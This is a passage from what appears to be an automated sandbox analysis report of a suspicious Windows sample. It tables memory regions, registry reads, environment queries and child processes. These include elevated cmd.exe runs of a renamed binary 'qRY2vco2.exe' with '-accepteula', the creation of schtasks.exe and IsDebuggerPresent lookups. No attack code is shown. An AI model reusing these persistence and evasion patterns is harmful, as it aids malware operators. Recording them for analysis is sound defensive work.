| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e7f0000 | 0x7e7f0000 | 0x7e8effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e8f0000 | 0x7e8f0000 | 0x7e912fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e914000 | 0x7e914000 | 0x7e914fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e919000 | 0x7e919000 | 0x7e91bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e91c000 | 0x7e91c000 | 0x7e91efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e91f000 | 0x7e91f000 | 0x7e91ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 99, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0x504, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #104: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #104 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:15, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe38 |
| Parent PID | 0xcd4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AF8
0x
ED4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000350000 | 0x00350000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x0035ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00363fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x00371fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x00373fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00393fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004540000 | 0x04540000 | 0x04540fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x04551fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004560000 | 0x04560000 | 0x0459ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x045affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x0484ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x045b0000 | 0x0466dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004750000 | 0x04750000 | 0x0484ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004850000 | 0x04850000 | 0x0494ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004950000 | 0x04950000 | 0x04a3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04a40000 | 0x04d76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3e0000 | 0x7f3e0000 | 0x7f4dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4e0000 | 0x7f4e0000 | 0x7f502fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f508000 | 0x7f508000 | 0x7f50afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50b000 | 0x7f50b000 | 0x7f50bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50c000 | 0x7f50c000 | 0x7f50efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50f000 | 0x7f50f000 | 0x7f50ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 58, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xa0c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #105: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #105 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Seyes.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:16, Reason: Child Process |
| Unmonitor | End Time: 00:02:32, Reason: Self Terminated |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf6c |
| Parent PID | 0xb70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EDC
0x
E1C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x049cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049d0000 | 0x049d0000 | 0x049dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x049e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x049f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x049f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a00000 | 0x04a00000 | 0x04a13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b60000 | 0x04b60000 | 0x04b63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b70000 | 0x04b70000 | 0x04b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04b81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b90000 | 0x04c4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x050a0000 | 0x053d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e8d0000 | 0x7e8d0000 | 0x7e9cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e9d0000 | 0x7e9d0000 | 0x7e9f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e9f8000 | 0x7e9f8000 | 0x7e9fafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e9fb000 | 0x7e9fb000 | 0x7e9fdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e9fe000 | 0x7e9fe000 | 0x7e9fefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e9ff000 | 0x7e9ff000 | 0x7e9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 206, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xb68, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #106: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #106 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "se-viii.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:16, Reason: Child Process |
| Unmonitor | End Time: 00:02:20, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe94 |
| Parent PID | 0xec4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A14
0x
E10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00330000 | 0x00359fff | Memory Mapped File | r |
|
|
|
- |
